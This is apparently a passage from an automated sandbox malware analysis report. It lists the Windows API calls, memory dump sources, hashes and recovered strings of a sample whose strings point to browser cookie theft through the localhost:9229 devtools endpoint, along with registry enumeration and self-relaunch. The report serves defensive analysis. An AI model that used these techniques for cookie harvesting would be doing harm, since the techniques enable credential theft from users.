                            • lstrlen.KERNEL32(?), ref: 00B095DB
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B09614
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                            • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                            • API String ID: 1201316467-3542011879
                            • Opcode ID: 6afb7544c1455efccdad3cfcc92d1e3758f4674cc440249cf78b01605554b1d8
                            • Instruction ID: 229042db63f061d2aecc81974f244d78eb7a42049079f83bc0d13f67b37056d2
                            • Opcode Fuzzy Hash: 6afb7544c1455efccdad3cfcc92d1e3758f4674cc440249cf78b01605554b1d8
                            • Instruction Fuzzy Hash: A9E10471E10218DBDF14DFA8D884ADEBBF5BF48300F1044A9E509A7291EB75AE49CF90
                            APIs
                            • memset.MSVCRT ref: 00B1D9A1
                            • memset.MSVCRT ref: 00B1D9B3
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00B1D9DB
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1DA0E
                            • lstrcat.KERNEL32(?,00000000), ref: 00B1DA1C
                            • lstrcat.KERNEL32(?,0187EE88), ref: 00B1DA36
                            • lstrcat.KERNEL32(?,?), ref: 00B1DA4A
                            • lstrcat.KERNEL32(?,0187D178), ref: 00B1DA5E
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1DA8E
                            • GetFileAttributesA.KERNEL32(00000000), ref: 00B1DA95
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B1DAFE
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                            • String ID:
                            • API String ID: 2367105040-0
                            • Opcode ID: 672da0345e9b1d9e9429d4aad42b262c4f8c92d89fd6838d6978099b039d8b18
                            • Instruction ID: 583114b58f63d6c1b388e839671a27e3fc4890b3612bfde802973b09e3000ccd
                            • Opcode Fuzzy Hash: 672da0345e9b1d9e9429d4aad42b262c4f8c92d89fd6838d6978099b039d8b18
                            • Instruction Fuzzy Hash: 0BB18F719102599BDB10EFA4DC989EEBBF9FF48300F5449A4F906E7250DB309E49CBA0
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B0B330
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0B37E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0B3A9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B0B3B1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0B3D9
                            • lstrlen.KERNEL32(00B34C50), ref: 00B0B450
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0B474
                            • lstrcat.KERNEL32(00000000,00B34C50), ref: 00B0B480
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0B4A9
                            • lstrlen.KERNEL32(00000000), ref: 00B0B52D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0B557
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B0B55F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0B587
                            • lstrlen.KERNEL32(00B34AD4), ref: 00B0B5FE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0B622
                            • lstrcat.KERNEL32(00000000,00B34AD4), ref: 00B0B62E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0B65E
                            • lstrlen.KERNEL32(?), ref: 00B0B767
                            • lstrlen.KERNEL32(?), ref: 00B0B776
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0B79E
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat
                            • String ID:
                            • API String ID: 2500673778-0
                            • Opcode ID: 3ba0957edc987c7e371d57afb08fb4052475ab6f6d3574c3c3e8cd64ac0974c1
                            • Instruction ID: 5375c47d3bde4d2bc239631daf8c305a12b71391bead6693386f2c2764677614
                            • Opcode Fuzzy Hash: 3ba0957edc987c7e371d57afb08fb4052475ab6f6d3574c3c3e8cd64ac0974c1
                            • Instruction Fuzzy Hash: 1D021A30A013068FCB25DF69D999A6ABBF5EF44304F1980E9E409DB3A1DB75DC46CB90
                            APIs
                              • Part of subcall function 00B271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00B271FE
                            • RegOpenKeyExA.ADVAPI32(?,0187B3D8,00000000,00020019,?), ref: 00B237BD
                            • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00B237F7
                            • wsprintfA.USER32 ref: 00B23822
                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00B23840
                            • RegCloseKey.ADVAPI32(?), ref: 00B2384E
                            • RegCloseKey.ADVAPI32(?), ref: 00B23858
                            • RegQueryValueExA.ADVAPI32(?,0187EC18,00000000,000F003F,?,?), ref: 00B238A1
                            • lstrlen.KERNEL32(?), ref: 00B238B6
                            • RegQueryValueExA.ADVAPI32(?,0187EBE8,00000000,000F003F,?,00000400), ref: 00B23927
                            • RegCloseKey.ADVAPI32(?), ref: 00B23972
                            • RegCloseKey.ADVAPI32(?), ref: 00B23989
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                            • String ID: - $%s\%s$?
                            • API String ID: 13140697-3278919252
                            • Opcode ID: 74be6a28a27f5e6eee86bcfc0a74572a41f79ce73181e5d0815cd9b96974b579
                            • Instruction ID: 9983637c7414544571b406fba7733916010a2cbcfc013bf95a4687bea5787332
                            • Opcode Fuzzy Hash: 74be6a28a27f5e6eee86bcfc0a74572a41f79ce73181e5d0815cd9b96974b579
                            • Instruction Fuzzy Hash: D8918C729002189FCB10DF94ED849EEB7F9FB48710F1485A9F509AB251DB35AE46CFA0
                            APIs
                            • InternetOpenA.WININET(00B2CFEC,00000001,00000000,00000000,00000000), ref: 00B090DF
                            • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00B090FC
                            • InternetCloseHandle.WININET(00000000), ref: 00B09109
                            • InternetReadFile.WININET(?,?,?,00000000), ref: 00B09166
                            • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00B09197
                            • InternetCloseHandle.WININET(00000000), ref: 00B091A2
                            • InternetCloseHandle.WININET(00000000), ref: 00B091A9
                            • strlen.MSVCRT ref: 00B091BA
                            • strlen.MSVCRT ref: 00B091ED
                            • strlen.MSVCRT ref: 00B0922E
                            • strlen.MSVCRT ref: 00B0924C
                              • Part of subcall function 00B08980: std::_Xinvalid_argument.LIBCPMT ref: 00B08996
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                            • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                            • API String ID: 1530259920-2144369209
                            • Opcode ID: 195bcc2e184bb0781c3bff502de87ebd33a36593d68b429511cb092a604bbd7c
                            • Instruction ID: 79ea5f38de254e2e4ead99ff9934f502a0a3b8be248a4a5282777bc4e4d3c57d
                            • Opcode Fuzzy Hash: 195bcc2e184bb0781c3bff502de87ebd33a36593d68b429511cb092a604bbd7c
                            • Instruction Fuzzy Hash: FE51A271640305ABD720DBA8DC45FEEFBF9DF48710F1401A9F905E3291EBB4AA4987A1
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 00B216A1
                            • lstrcpy.KERNEL32(00000000,0186A550), ref: 00B216CC
                            • lstrlen.KERNEL32(?), ref: 00B216D9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B216F6
                            • lstrcat.KERNEL32(00000000,?), ref: 00B21704
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B2172A
                            • lstrlen.KERNEL32(0187E4E8), ref: 00B2173F
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B21762
                            • lstrcat.KERNEL32(00000000,0187E4E8), ref: 00B2176A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B21792
                            • ShellExecuteEx.SHELL32(?), ref: 00B217CD
                            • ExitProcess.KERNEL32 ref: 00B21803
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                            • String ID: <
                            • API String ID: 3579039295-4251816714
                            • Opcode ID: dc086ec0d5845ca1d0edec3f75f4eef363336d99798de9cee070abc5a9c6aa86
                            • Instruction ID: 24356ef8d02d285641aaa824717258c48474caa3257926e4524b959e245a0ec3
                            • Opcode Fuzzy Hash: dc086ec0d5845ca1d0edec3f75f4eef363336d99798de9cee070abc5a9c6aa86
                            • Instruction Fuzzy Hash: C0515171A017299BDB11DFA8DC84A9EBBF9EF94300F044575E509E3391DF74AE058BA0
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1EFE4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1F012
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00B1F026
                            • lstrlen.KERNEL32(00000000), ref: 00B1F035
                            • LocalAlloc.KERNEL32(00000040,00000001), ref: 00B1F053
                            • StrStrA.SHLWAPI(00000000,?), ref: 00B1F081
                            • lstrlen.KERNEL32(?), ref: 00B1F094
                            • lstrlen.KERNEL32(00000000), ref: 00B1F0B2
                            • lstrcpy.KERNEL32(00000000,ERROR), ref: 00B1F0FF
                            • lstrcpy.KERNEL32(00000000,ERROR), ref: 00B1F13F
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$AllocLocal
                            • String ID: ERROR
                            • API String ID: 1803462166-2861137601
                            • Opcode ID: 5f7818d142017dbc6f55f4bf2c51715dd08eb4edd44dc8d8a31ec297dee07707
                            • Instruction ID: 48b1f6656d432b171d128dc8cc8926956c9430bf1fe5a8fc1c63e1208fb9a28b
                            • Opcode Fuzzy Hash: 5f7818d142017dbc6f55f4bf2c51715dd08eb4edd44dc8d8a31ec297dee07707
                            • Instruction Fuzzy Hash: 53516D31A102069BCB21AF78DC49AAE7BE5EF54300F5545B8F84AEB252DF70DC49CB90
                            APIs
                            • GetEnvironmentVariableA.KERNEL32(01878998,00D39BD8,0000FFFF), ref: 00B0A026
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B0A053
                            • lstrlen.KERNEL32(00D39BD8), ref: 00B0A060
                            • lstrcpy.KERNEL32(00000000,00D39BD8), ref: 00B0A08A
                            • lstrlen.KERNEL32(00B34C4C), ref: 00B0A095
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0A0B2
                            • lstrcat.KERNEL32(00000000,00B34C4C), ref: 00B0A0BE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0A0E4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B0A0EF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0A114
                            • SetEnvironmentVariableA.KERNEL32(01878998,00000000), ref: 00B0A12F
                            • LoadLibraryA.KERNEL32(01865208), ref: 00B0A143
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                            • String ID:
                            • API String ID: 2929475105-0
                            • Opcode ID: 5b9b8d4b3a13faa09f2b20909631d1625dd2b2abe3c2e2a4c9d66d22f80ef9a0
                            • Instruction ID: 7a5b254f3c70a13fe67609e953206876cd5f6708ad4a77e22e8f25441f967c3a
                            • Opcode Fuzzy Hash: 5b9b8d4b3a13faa09f2b20909631d1625dd2b2abe3c2e2a4c9d66d22f80ef9a0
                            • Instruction Fuzzy Hash: DD918D30A00B009FD7319FA8DC88A663BE5EB94705F4049A8F505D73E2EFB5DD449BA2
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B1C8A2
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B1C8D1
                            • lstrlen.KERNEL32(00000000), ref: 00B1C8FC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1C932
                            • StrCmpCA.SHLWAPI(00000000,00B34C3C), ref: 00B1C943
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
